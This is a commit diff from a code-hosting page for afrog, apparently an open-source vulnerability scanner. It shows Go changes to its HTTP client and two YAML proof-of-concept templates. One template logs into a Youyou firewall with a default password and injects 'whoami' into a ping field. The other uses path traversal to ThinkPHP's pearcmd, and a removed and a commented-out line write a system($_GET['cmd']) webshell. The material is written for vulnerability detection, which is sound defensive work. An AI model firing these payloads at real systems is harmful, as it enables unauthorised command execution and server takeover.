crash.software
Projects
Pull Requests
Issues
Builds
afrog
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY afrog Commits 8bab99b0
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■
    pkg/core/checker.go
    skipped 134 lines
    135 135   pocRstTemp.ResultRequest = c.VariableMap["request"].(*proto.Request)
    136 136   }
    137 137   if c.VariableMap["fulltarget"] != nil {
     138 + pocRstTemp.FullTarget = c.VariableMap["fulltarget"].(string)
    138 139   c.Result.FullTarget = c.VariableMap["fulltarget"].(string)
    139 140   }
    140 141   c.Result.AllPocResult = append(c.Result.AllPocResult, &pocRstTemp)
    skipped 88 lines
    229 230   c.Result.PocInfo = gpa.Poc
    230 231   if len(r.AllPocResult) > 0 {
    231 232   for _, v := range r.AllPocResult {
    232  - c.Result.AllPocResult = append(c.Result.AllPocResult, &PocResult{ResultRequest: v.ResultRequest, ResultResponse: v.ResultResponse, IsVul: v.IsVul})
     233 + c.Result.AllPocResult = append(c.Result.AllPocResult, &PocResult{ResultRequest: v.ResultRequest, ResultResponse: v.ResultResponse, IsVul: v.IsVul, FullTarget: target})
    233 234   }
    234 235   }
    235 236   
    skipped 49 lines
  • ■ ■ ■ ■ ■
    pkg/core/result.go
    skipped 21 lines
    22 22  }
    23 23   
    24 24  type PocResult struct {
     25 + FullTarget string
    25 26   ResultRequest *proto.Request
    26 27   ResultResponse *proto.Response
    27 28   IsVul bool
    skipped 78 lines
  • pkg/html/html.go
    Unable to diff as some line is too long.
  • ■ ■ ■ ■ ■
    pkg/protocols/http/retryhttpclient/client.go
    skipped 8 lines
    9 9   "net"
    10 10   "net/http"
    11 11   "net/http/cookiejar"
     12 + "net/http/httptrace"
    12 13   "net/url"
    13 14   "regexp"
    14 15   "runtime"
    skipped 146 lines
    161 162   
    162 163   // target
    163 164   target = fmt.Sprintf("%s://%s", u.Scheme, u.Host)
    164  - targetfull := fulltarget(fmt.Sprintf("%s://%s", u.Scheme, u.Host), u.Path)
    165  - if targetfull != target {
    166  - target = targetfull
     165 + if !strings.HasPrefix(rule.Request.Path, "^") {
     166 + targetfull := fulltarget(fmt.Sprintf("%s://%s", u.Scheme, u.Host), u.Path)
     167 + if targetfull != target {
     168 + target = targetfull
     169 + }
    167 170   }
    168 171   
    169 172   // path
    170 173   rule.Request.Path = setVariableMap(strings.TrimSpace(rule.Request.Path), variableMap)
     174 + if !strings.HasPrefix(rule.Request.Path, "^") {
     175 + target = strings.TrimRight(target, "/") + rule.Request.Path
     176 + } else {
     177 + target = strings.TrimRight(target, "/") + "/" + rule.Request.Path[1:]
     178 + }
    171 179   // rule.Request.Path = strings.ReplaceAll(rule.Request.Path, " ", "%20")
    172 180   // rule.Request.Path = strings.ReplaceAll(rule.Request.Path, "+", "%20")
    173 181   
    skipped 9 lines
    183 191   }
    184 192   
    185 193   // newhttprequest
    186  - req, err := retryablehttp.NewRequest(rule.Request.Method, strings.TrimRight(target, "/")+rule.Request.Path, nil)
     194 + req, err := retryablehttp.NewRequest(rule.Request.Method, target, nil)
    187 195   if len(rule.Request.Body) > 0 {
    188  - req, err = retryablehttp.NewRequest(rule.Request.Method, strings.TrimRight(target, "/")+rule.Request.Path, strings.NewReader(rule.Request.Body))
     196 + req, err = retryablehttp.NewRequest(rule.Request.Method, target, strings.NewReader(rule.Request.Body))
    189 197   }
    190 198   if err != nil {
    191 199   return err
    skipped 15 lines
    207 215   req.Header.Add("User-Agent", utils.RandomUA())
    208 216   }
    209 217   
     218 + // latency
     219 + var milliseconds int64
     220 + start := time.Now()
     221 + trace := httptrace.ClientTrace{}
     222 + trace.GotFirstResponseByte = func() {
     223 + milliseconds = time.Since(start).Nanoseconds() / 1e6
     224 + }
     225 + req = req.WithContext(httptrace.WithClientTrace(req.Context(), &trace))
     226 + 
    210 227   // http client do request
    211 228   resp := &http.Response{}
    212 229   if !rule.Request.FollowRedirects {
    skipped 39 lines
    252 269   protoResp.Body = []byte(utf8RespBody)
    253 270   protoResp.Raw = []byte(resp.Proto + " " + resp.Status + "\n" + strings.Trim(rawHeaderBuilder.String(), "\n") + "\n\n" + utf8RespBody)
    254 271   protoResp.RawHeader = []byte(strings.Trim(rawHeaderBuilder.String(), "\n"))
     272 + protoResp.Latency = milliseconds
    255 273   variableMap["response"] = protoResp
    256 274   
    257 275   // store the request
    skipped 16 lines
    274 292   protoReq.ContentType = req.Header.Get("Content-Type")
    275 293   protoReq.Body = []byte(rule.Request.Body)
    276 294   
    277  - reqPath := strings.Replace(utils.UrlTypeToString(protoResp.Url), strings.TrimRight(target, "/"), "", 1)
     295 + reqPath := strings.Replace(target, fmt.Sprintf("%s://%s", u.Scheme, u.Host), "", 1)
    278 296   protoReq.Raw = []byte(req.Method + " " + reqPath + " " + req.Proto + "\n" + "Host: " + req.URL.Host + "\n" + strings.Trim(rawReqHeaderBuilder.String(), "\n") + "\n\n" + string(rule.Request.Body))
    279 297   protoReq.RawHeader = []byte(strings.Trim(rawReqHeaderBuilder.String(), "\n"))
    280 298   variableMap["request"] = protoReq
    281 299   
    282 300   // store the full target url
    283  - variableMap["fulltarget"] = utils.UrlTypeToString(protoResp.Url)
     301 + variableMap["fulltarget"] = target
    284 302   
    285 303   return nil
    286 304  }
    skipped 220 lines
  • ■ ■ ■ ■ ■ ■
    pocs/temp/afrog-pocs/test/youyou-firewall-rce.yaml
     1 +id: youyou-firewall-rce
     2 + 
     3 +info:
     4 + name: 佑友防火墙 后台命令执行漏洞
     5 + author: daffainfo
     6 + severity: critical
     7 + description: |
     8 + 佑友防火墙+路由,保障您的网络更安全更稳定。弥补传统路由器因内外人数增加带来的网络延迟和不稳定问题;防火墙模块具备了防黑功能,防止ARP等病毒骚扰;佑友防火墙网关同时还配备了上网行为管理模块,可以合理有效控制员工上网行为,大大降低了员工上网中病毒的概率,同时高效使用公司带宽,不会造成网络阻塞等状况。佑友防火墙系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
     9 + fofa-query: title="佑友防火墙"
     10 + reference:
     11 + - https://mp.weixin.qq.com/s/DE34Gu6Dw9hBbkdJqizSYQ
     12 +
     13 +set:
     14 + hosturl: request.url
     15 +rules:
     16 + r0:
     17 + request:
     18 + method: POST
     19 + path: /index.php?c=user&a=ajax_save
     20 + body: username=admin&password=hicomadmin&language=zh-cn
     21 + expression: |
     22 + response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"message":') && response.raw_header.bcontains(b'Set-Cookie') && response.raw_header.bcontains(b'FWSESSID=')
     23 + output:
     24 + search: '"Set-Cookie: FWSESSID=(?P<phpsession>.*?)\n".bsubmatch(response.raw_header)'
     25 + phpsession: search["phpsession"]
     26 + r1:
     27 + request:
     28 + method: POST
     29 + path: /index.php?c=maintain&a=ping
     30 + headers:
     31 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     32 + Cookie: "PHPSESSID={{phpsession}}"
     33 + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
     34 + Accept-Encoding: gzip, deflate
     35 + Origin: "{{hosturl}}"
     36 + Referer: "{{hosturl}}/index.php?c=maintain&a=ping"
     37 + Upgrade-Insecure-Requests: 1
     38 + Sec-Fetch-Dest: frame
     39 + Sec-Fetch-Mode: navigate
     40 + Sec-Fetch-Site: same-origin
     41 + Sec-Fetch-User: ?1
     42 + Te: trailers
     43 + body: interface=&destip=+127.0.0.1+%7C+whoami
     44 + expression: |
     45 + response.status == 200 && response.body.bcontains(b'系统管理') && response.body.bcontains(b'维护工具') && response.body.bcontains(b'Ping')
     46 +expression: r0() && r1()
  • ■ ■ ■ ■ ■
    pocs/temp/afrog-pocs/vulnerability/thinkphp-lang-rce.yaml
    skipped 7 lines
    8 8   thinkphp多语言模块存在Rce漏洞
    9 9   app="Thinkphp"
    10 10  set:
    11  - fileName: randomLowercase(8) + ".php"
     11 + n1: randomInt(800000000, 1000000000)
     12 +payloads:
     13 + payloads:
     14 + parm1: |
     15 + "?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?="
     16 + parm2: |
     17 + "?+config-create+/<?="
    12 18  rules:
     19 + # r00:
     20 + # request:
     21 + # method: GET
     22 + # path: "/public/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{n1}}.php"
     23 + # expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
    13 24   r0:
    14 25   request:
    15 26   method: GET
    16  - path: "/public/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{fileName}}"
    17  - expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
     27 + path: "/{{parm1}}md5({{n1}});?>+/var/www/html/{{n1}}.php"
     28 + headers:
     29 + think-lang: ../../../../../../../../usr/local/lib/php/pearcmd
     30 + Cookie: think_lang=../../../../../../../../usr/local/lib/php/pearcmd
     31 + expression: response.status == 200
    18 32   r1:
    19 33   request:
    20 34   method: GET
    21  - path: "/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{fileName}}"
    22  - expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
    23  -expression: r0() || r1()
     35 + path: "/{{parm2}}md5({{n1}});?>+/var/www/html/{{n1}}.php"
     36 + headers:
     37 + think-lang: ../../../../../../../../usr/local/lib/php/pearcmd
     38 + Cookie: think_lang=../../../../../../../../usr/local/lib/php/pearcmd
     39 + expression: response.status == 200
     40 + r2:
     41 + request:
     42 + method: GET
     43 + path: ^{{n1}}.php
     44 + expression: response.body.bcontains(bytes(md5(string(n1))))
     45 +expression: (r0() || r1()) && r2()
Please wait...
Page is in error, reload to recover